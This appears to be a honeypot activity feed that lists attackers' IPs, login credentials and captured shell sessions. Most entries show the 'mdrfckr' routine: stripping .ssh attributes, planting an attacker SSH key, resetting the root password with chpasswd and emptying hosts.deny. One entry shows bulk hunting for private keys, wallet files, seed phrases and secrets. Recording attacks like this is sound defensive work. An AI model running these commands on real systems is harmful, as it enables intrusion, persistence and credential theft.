$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_112 (104.218.166.62) β€” QuαΊ­n NΔƒm, Vietnam Β· 1 session Β· 19 cmds
2026-05-17 11:48 EDT Β· as root/masoud
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:nA89xJHpRouP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_35 (119.96.81.99) β€” Shizishan, China Β· 1 session Β· 19 cmds
2026-05-17 11:45 EDT Β· as root/loveme
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hHCI53qqTszn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_86 (43.159.39.191) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-17 04:06 EDT Β· as user/testtesttest
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "testtesttest\n84PVtnd9M108\n84PVtnd9M108"|passwd|bash
$ Enter new UNIX password:
$ echo "testtesttest\n84PVtnd9M108\n84PVtnd9M108\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_11 (154.18.197.35) β€” Quezon City, Philippines Β· 3 sessions Β· 58 cmds
2026-05-09 08:21 EDT Β· as root/Xu123456!, root/^YHN6yhn, user4/123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:SyP6nDLqkMQ7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:QLptruyvsK2C"|chpasswd|bash
$ echo -e "123456789\np1nc4f9VY6Z7\np1nc4f9VY6Z7"|passwd|bash
$ Enter new UNIX password:
$ echo "123456789\np1nc4f9VY6Z7\np1nc4f9VY6Z7\n"|passwd
🎭 burger_root_57 (49.51.179.91) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-17 01:48 EDT Β· as root/jake1234, root/louwg
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:51NMJCMGt7jI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:2PzlP9oaJyks"|chpasswd|bash
🎭 rogue_root_107 (43.156.2.209) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 01:48 EDT Β· as root/^YHN6yhn
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:OsbnrVdLAVRg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_27 (106.13.48.156) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-17 01:47 EDT Β· as root/malcolm
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:E8khuC4XW1TN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_44 (72.253.251.7) β€” Lahaina, United States Β· 1 session Β· 19 cmds
2026-05-17 01:43 EDT Β· as root/louwg
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7lI2Tk1W73cd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_20 (103.24.212.42) β€” Semarang, Indonesia Β· 36 sessions Β· 37 cmds
2026-05-13 03:10 EDT Β· as bitcoin/bitcoin, debian/debian2026!, exchange/exchange
password change attempt
$ grep -c '^phil:' /etc/passwd
$ getent passwd phil 2>/dev/null; echo EXIT_CODE:0 // password change attempt
$ id phil 2>/dev/null && echo 'PHIL_EXISTS' || echo 'NO_PHIL'
$ whoami; hostname; uname -a; uptime
$ echo BMOK Γ—3
$ find / -maxdepth 3 -name "*.key" -o -name "*.pem" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.keystore" -o -name "wallet.dat" 2>/dev/null; echo "===TXT_FILES==="; find / -maxdepth 3 -name "*.txt" 2>/dev/null; echo "===DONE==="
$ find /var/lib/mysql -type f 2>/dev/null; echo "===EJABBERD==="; find /etc/ejabberd -type f 2>/dev/null; find /var/lib/ejabberd -type f 2>/dev/null; echo "===MYSQL_CONFIG==="; cat /etc/mysql/my.cnf 2>/dev/null; echo "===DONE==="
$ grep -rl -i "api_key\|api_key\|secret\|password\|token\|private_key" /etc/ 2>/dev/null | head -50; echo "===DONE_ETC_SECRETS==="
$ find /home -type f 2>/dev/null; echo "===DOTFILES==="; ls -la /home/*/ 2>/dev/null; ls -la /root/.* 2>/dev/null; echo "===VAR_LIB==="; find /var/lib -type f -maxdepth 3 2>/dev/null; echo "===DONE==="
$ ls -la /home/ 2>/dev/null; echo "===ROOT==="; ls -la /root/ 2>/dev/null; echo "===OPT==="; ls -la /opt/ 2>/dev/null; echo "===VAR===; ls /var/lib/ 2>/dev/null
$ find /etc -type f 2>/dev/null; echo "DONE_ETC"
$ find /home/bitcoin -type f 2>/dev/null; echo "DONE_FIND"
$ ls -laR ~ 2>/dev/null
$ ls -la ~
$ find ~ -maxdepth 3 -type f \( -name "*.yml" -o -name "*.yaml" -o -name "*.json" -o -name "*.toml" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.env" -o -name "*.properties" -o -name "*.xml" \) ! -path "*/node_modules/*" ! -path "*/.cache/*" ! -path "*/.npm/*" ! -path "*/.config/cargo/*" 2>/dev/null | head -100
$ find ~ -maxdepth 2 -type f 2>/dev/null | head -100; echo "===DIRS==="; find ~ -maxdepth 2 -type d 2>/dev/null | head -50
$ docker ps -a 2>/dev/null; echo "===DOCKER_IMAGES==="; docker images 2>/dev/null; echo "===DOCKER_ENV==="; docker inspect $(docker ps -q) 2>/dev/null | grep -iE "(env|command|entrypoint)" | head -50 // container manipulation
$ docker ps -q // container manipulation
$ cat /proc/net/tcp /proc/net/tcp6 2>/dev/null | head -50; echo "---"; netstat -tlnp 2>/dev/null || cat /proc/net/fib_trie 2>/dev/null | grep -B1 "LOCAL" | tail -20
$ free -h // RAM check
$ ss -tlnp
$ ps aux // process enumeration
$ df -h // disk space check
$ echo $SHELL; which bash sh zsh fish 2>/dev/null; ls -la /etc/passwd 2>/dev/null // password change attempt
$ id phil 2>&1; echo "EXIT_CODE=$?"
$ echo "=== DATABASE SERVICES ==="; ss -tlnp 2>/dev/null | grep -E "(3306|5432|27017|6379|5672|9200)"; echo "=== SQL FILES ==="; find ~ -maxdepth 4 \( -name "*.sql" -o -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" \) ! -path "*/node_modules/*" ! -path "*/.cache/*" 2>/dev/null | head -50; echo "=== BACKUP DIRS ==="; find ~ -maxdepth 3 -type d \( -name "backup*" -o -name "backups" -o -name "dump*" -o -name "sql" \) 2>/dev/null | head -30; echo "=== DATA DIRS ==="; find ~ -maxdepth 2 -type d 2>/dev/null | head -50; echo "=== USER LIST IN DBS ==="; which mysql psql mongosh mongo sqlite3 redis-cli 2>/dev/null | head -10; echo "=== DOCKER ==="; docker ps 2>/dev/null | head -30; docker ps -a 2>/dev/null | tail -20; docker images 2>/dev/null | head -20 // container manipulation
$ echo "=== WALLET FILES ==="; find ~ -maxdepth 4 \( -name "*.keystore" -o -name "wallet.dat*" -o -name "wallet.json" -o -name "keystore" -type d \) ! -path "*/node_modules/*" ! -path "*/.cache/*" 2>/dev/null | head -50; echo "=== METAMASK/SEED PHRASE FILES ==="; find ~ -maxdepth 4 \( -name "*metamask*" -o -name "*seed*" -o -name "*mnemonic*" -o -name "*phrase*" -o -name "*hdwallet*" -o -name "*bip39*" \) ! -path "*/node_modules/*" ! -path "*/.cache/*" 2>/dev/null | head -50; echo "=== TEXT FILES WITH SECRET/KEY/WALLET/PHRASE ==="; find ~ -maxdepth 3 -name "*.txt" ! -path "*/node_modules/*" ! -path "*/.cache/*" -type f 2>/dev/null | head -50; echo "=== DOT FILES ==="; find ~ -maxdepth 2 -name ".*" -type f ! -path "*/node_modules/*" ! -path "*/.cache/*" ! -path "*/.gnupg/*" ! -path "*/.ssh/*" 2>/dev/null | head -50; echo "=== DOWNLOADS ==="; ls -la ~/Downloads/ 2>/dev/null | head -30; ls -la ~/Documents/ 2>/dev/null | head -30
$ echo "=== HOME FILES ==="; ls -la ~ 2>/dev/null; echo "=== ENVIRONMENT VARS ==="; env | grep -iE "(api|key|secret|token|password|pass|auth)" 2>/dev/null | head -50; echo "=== .ENV FILES ==="; find ~ -maxdepth 3 -name ".env*" -type f 2>/dev/null | head -50; find /etc -maxdepth 2 -name ".env*" -type f 2>/dev/null | head -20; echo "=== CONFIG WITH KEY/SECRET/TOKEN ==="; find ~ -maxdepth 3 -type f \( -name "*.yml" -o -name "*.yaml" -o -name "*.json" -o -name "*.toml" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.env" -o -name "*.properties" \) ! -path "*/node_modules/*" ! -path "*/.cache/*" ! -path "*/.npm/*" 2>/dev/null | head -100
$ echo "=== CRONTAB ==="; crontab -l 2>/dev/null || echo "NO_CRONTAB"; echo "=== USER CRON FILES ==="; ls -la /var/spool/cron/crontabs/ 2>/dev/null || echo "NO_CRON_DIR"; echo "=== ENABLED SERVICES ==="; systemctl list-units --type=service --state=running 2>/dev/null | head -30; echo "=== USER SERVICES (systemctl --user) ==="; systemctl --user list-units --type=service --state=running 2>/dev/null | head -20 // persistence setup
$ echo "=== HOSTNAME ==="; hostname; echo "=== UPTIME ==="; uptime; echo "=== DISK ==="; df -h 2>/dev/null | head -20; echo "=== MEMORY ==="; free -h 2>/dev/null; echo "=== TOP PROCESSES BY CPU ==="; ps aux --sort=-%cpu 2>/dev/null | head -20; echo "=== TOP PROCESSES BY MEM ==="; ps aux --sort=-%mem 2>/dev/null | head -20; echo "=== LISTENING PORTS ==="; ss -tlnp 2>/dev/null | head -20; echo "=== ACTIVE CONNS ==="; ss -tnp 2>/dev/null | head -20; echo "=== OS INFO ==="; cat /etc/os-release 2>/dev/null | head -10
$ getent passwd phil 2>/dev/null && echo "PHIL_EXISTS" || echo "PHIL_NOT_FOUND" // password change attempt
$ echo CONNECTION_OK; hostname; whoami; date -u
$ echo OK
$ id phil 2>&1; getent passwd phil 2>&1; ls -la /home/ 2>/dev/null; cat /etc/passwd | grep -v nologin | grep -v /bin/false | grep -v sync // user enumeration
$ hostname; whoami; uptime
🎭 bike_root_5 (52.233.193.61) β€” Amsterdam, Netherlands Β· 4 sessions Β· 77 cmds
2026-05-08 17:16 EDT Β· as root/control, root/qazwsx123, root/viewsonic
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:3VsHgvKoUTHI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:yGzkgxjyVGif"|chpasswd|bash
$ echo "root:9fmejQzqgl0W"|chpasswd|bash
$ echo -e "demo123\nkqkehbs6vEvE\nkqkehbs6vEvE"|passwd|bash
$ Enter new UNIX password:
$ echo "demo123\nkqkehbs6vEvE\nkqkehbs6vEvE\n"|passwd
🎭 star_root_42 (43.173.87.5) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-16 22:30 EDT Β· as root/Server2023!, root/whathefuck
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:UdZk5ySQXDXd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:l6ApM2lG7WCH"|chpasswd|bash
🎭 eagle_root_56 (43.159.145.203) β€” Santa Clara, United States Β· 3 sessions Β· 57 cmds
2026-05-16 22:29 EDT Β· as root/cmb, root/qazwsx123, root/viewsonic
